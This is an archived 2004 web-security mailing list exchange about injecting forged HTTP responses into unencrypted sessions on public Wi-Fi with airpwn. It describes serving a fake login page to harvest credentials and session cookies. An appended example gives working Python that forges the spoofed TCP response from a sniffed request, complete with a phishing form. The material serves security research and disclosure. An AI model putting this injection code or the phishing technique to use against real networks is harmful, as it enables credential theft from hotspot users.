WebApp Sec mailing list archives
RE: alternate (new?) web app exploitation angle--too much coffee version
From: "Evans, Arian" <Arian.Evans () fishnetsecurity com>
Date: Mon, 4 Oct 2004 09:46:53 -0500
-----Original Message----- From: Jeremiah Grossman [mailto:jeremiah () whitehatsec com]
Is this basically a combo of Wifi-Hijack with XSS involved? Just making sure I'm reading you right.
Yes-no. My post is way too long for readability, isn't it? :( You don't have to hijack anything; you are just beating the webserver to the punch in responding to the client. I tried to be humorous below but definitely did not succeed.

airpwn makes injection into unencrypted sessions trivial (constructing the response and submitting it to the client in a timely fashion may not be trivial, but the act of injection is); any attacks against Wi-Fi encryption itself are separate.

The real goal for me here is breaking the SSL session to get at the good stuff. The best thing I can do so far is assume a GET verb (on behalf of the client) and respond with a valid (non-SSL) construct of a login page for the client to re-post their login data. The assumption is that the client thinks something broke and has to log in again. Problems I run into are (a) the browser pop-up and (b) postable forms that only allow an SSL connection and don't redirect, on the assumption that the login page is also SSL-only.

Arian
On Friday, October 1, 2004, at 10:52 AM, Evans, Arian wrote:

Arian Security Advisory 01.10.04

I. VENDOR: I'm not very smart, but I stumbled onto something new to me this week.

II. <DISCLAIMER> Hopefully I'm not a total idiot and everyone's already thought of this/done this and it's a completely banal post simply missing a "Secrets of the XSS Injection Masters" PDF linking to my super-XSS-injection defender box. </disclaimer>

III. DESCRIPTION: Rainy Friday script/command injection fun: airpwn + app you're testing + $client.wireless.hotspot

IV. ANALYSIS: It's slick, it's simple, and it scales nicely =) Something useful did come out of Defcon 12... Now most of the juicy bits you want are probably wrapped in an SSL tunnel which you won't be getting here, unless you 'break' the session... read on, I am still figuring out ways to break and restart the SSL session. So this attack is more of novelty value, but it's a nice quick way to demonstrate arbitrary script execution on dozens of clients in parallel. Or exploitation of the client's app. Or fill a bored Saturday in the excitingly cosmopolitan Kansas City.

V. PROOF of CONCEPT: Grab a response from the webapp. Rebuild it. Respond with it to the clients. Force them to re-enter their input, click on submit.... or send them a link, or or or. Obviously you could send the client a bomb directly with this, but perhaps you want something out of their session, so now you brute-force break their session by sending a new login page and make them log back in with your XSS. You get session cookie/parameter and credentials, the Britney pics, a good laugh, etc.

VI. WORKAROUND: CAT5/6.

VII. BACKGROUND: Some smart CS student tried messing with people (me) at a hotspot next to a local university and it switched me into <evil> mode and resulted in something a lot more interesting than this XSS. CS major got the smackdown from the GED.

VIII. DISCLOSURE TIMELINE: </evil> Think of a recent related Windows exploit and your lights should go on quicker than mine did at something else you can do with this approach. Look for another post this weekend from a non-work account to BT and FD lists; if BT mod-bounces I'll post to pen.

IX. VENDOR RESPONSE: Can't decide if this is pen or web. Use your powers for good. If you see me in KC this weekend with a laptop that says "PLEASE WAKE ME FOR MEALS" on the lid, turn off your 802.11b and find a landline. :)

Arian Evans
Sr. Security Engineer
FishNet Security
KC Office: 816.421.6611
Direct: 816.701.2045
Toll Free: 888.732.9406
Fax: 816.474.0394
http://www.fishnetsecurity.com

The information transmitted in this e-mail is intended only for the addressee and may contain confidential and/or privileged material. Any interception, review, retransmission, dissemination, or other use of, or taking of any action upon this information by persons or entities other than the intended recipient is prohibited by law and may subject them to criminal or civil liability. If you received this communication in error, please contact us immediately at 816.421.6611, and delete the communication from any computer or network system.
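The "beating the webserver to the punch" injection discussed in the reply and in the original post, as an added example that is not part of the thread and is not airpwn's code. It shows the one thing that makes the forged response acceptable to the client: the spoofed segment takes its sequence number from the sniffed request's acknowledgement number and acknowledges the request's own bytes, so the real server's later answer looks like a retransmission and is discarded. It also shows the limit Arian ran into: a TLS request on 443 gives nothing to race. All addresses, ports, sequence numbers, the captured GET and the login-form URL are constructed for illustration; packets are built and parsed in memory and nothing is sent.

```python
"""Forging the "early" HTTP response that airpwn-style injection relies on.

Added example for this thread; not code from the thread or from airpwn.
Addresses, ports, sequence numbers and the login form URL are constructed.
Packets are built and parsed in memory only; nothing is sent.
"""
import socket
import struct

TCP_PROTO = 6
FLAG_FIN, FLAG_PSH, FLAG_ACK = 0x001, 0x008, 0x010

# Constructed stand-in for the "non-SSL construct of a login page" from the
# thread. The form action is a hypothetical attacker-controlled cleartext URL.
FAKE_LOGIN_PAGE = (
    b"<html><body><p>Your session has expired. Please sign in again.</p>"
    b'<form method="POST" action="http://login.example.test/login">'
    b'<input name="user"><input name="pass" type="password">'
    b'<input type="submit" value="Login"></form></body></html>'
)


def checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum over 16-bit words (pads odd length)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_ipv4_tcp(src, dst, sport, dport, seq, ack, flags, payload):
    """Minimal IPv4+TCP segment (no options) with valid IP and TCP checksums."""
    src_b, dst_b = socket.inet_aton(src), socket.inet_aton(dst)
    tcp_len = 20 + len(payload)

    def tcp_hdr(csum):  # data offset 5 words, window 65535, urgent pointer 0
        return struct.pack("!HHIIHHHH", sport, dport, seq, ack,
                           (5 << 12) | flags, 65535, csum, 0)

    pseudo = src_b + dst_b + struct.pack("!BBH", 0, TCP_PROTO, tcp_len)
    tcp = tcp_hdr(checksum(pseudo + tcp_hdr(0) + payload))

    def ip_hdr(csum):  # version 4, IHL 5, fixed id, DF set, TTL 64
        return struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + tcp_len, 0x1234,
                           0x4000, 64, TCP_PROTO, csum, src_b, dst_b)

    return ip_hdr(checksum(ip_hdr(0))) + tcp + payload


def parse_ipv4_tcp(pkt: bytes) -> dict:
    """Pull out the fields the injection needs from a raw IPv4/TCP packet."""
    ihl = (pkt[0] & 0x0F) * 4
    tcp = pkt[ihl:]
    sport, dport, seq, ack, off_flags = struct.unpack("!HHIIH", tcp[:14])
    return {
        "src": socket.inet_ntoa(pkt[12:16]), "dst": socket.inet_ntoa(pkt[16:20]),
        "sport": sport, "dport": dport, "seq": seq, "ack": ack,
        "flags": off_flags & 0x1FF, "payload": tcp[(off_flags >> 12) * 4:],
    }


def tcp_checksum_ok(pkt: bytes) -> bool:
    """Recompute the TCP checksum over pseudo-header + segment; 0 means valid."""
    seg = pkt[(pkt[0] & 0x0F) * 4:]
    pseudo = pkt[12:16] + pkt[16:20] + struct.pack("!BBH", 0, TCP_PROTO, len(seg))
    return checksum(pseudo + seg) == 0


def forge_response(request_pkt: bytes, html: bytes = FAKE_LOGIN_PAGE):
    """Build the spoofed reply to a sniffed cleartext GET, as the server would.

    seq = the client's ack (next byte it expects from the server) and
    ack = client seq + request length, so the client accepts the segment as
    the server's answer. The real answer, arriving later with the same
    sequence numbers, is treated as a retransmission of data the client
    already has and dropped: that is the race. FIN closes the connection.
    """
    req = parse_ipv4_tcp(request_pkt)
    # Only a plaintext request can be answered this way. A TLS session on 443
    # never hands us a readable request nor lets the client accept a
    # plaintext reply, which is where the thread stalls on "breaking SSL".
    if req["dport"] != 80 or not req["payload"].startswith(b"GET "):
        return None
    head = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n"
            b"Connection: close\r\nContent-Length: %d\r\n\r\n" % len(html))
    return build_ipv4_tcp(src=req["dst"], dst=req["src"],
                          sport=req["dport"], dport=req["sport"],
                          seq=req["ack"], ack=req["seq"] + len(req["payload"]),
                          flags=FLAG_PSH | FLAG_ACK | FLAG_FIN, payload=head + html)


if __name__ == "__main__":
    # Constructed client GET: 10.0.0.5:40000 -> 203.0.113.10:80
    get = b"GET /login HTTP/1.1\r\nHost: login.example.test\r\n\r\n"
    req = build_ipv4_tcp("10.0.0.5", "203.0.113.10", 40000, 80, 1000, 5000,
                         FLAG_PSH | FLAG_ACK, get)
    print({k: v for k, v in parse_ipv4_tcp(forge_response(req)).items() if k != "payload"})
```

The timing constraint Arian mentions is real: the forged segment must reach the client before the server's first data segment, which is why the technique lives on the wireless segment next to the victim rather than anywhere upstream. The `dport != 80` guard is the whole caveat in one line; a form that is only reachable over SSL never produces the plaintext GET this function needs.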
Current thread:
- alternate (new?) web app exploitation angle--too much coffee version Evans, Arian (Oct 03)
- <Possible follow-ups>
- RE: alternate (new?) web app exploitation angle--too much coffee version Evans, Arian (Oct 04)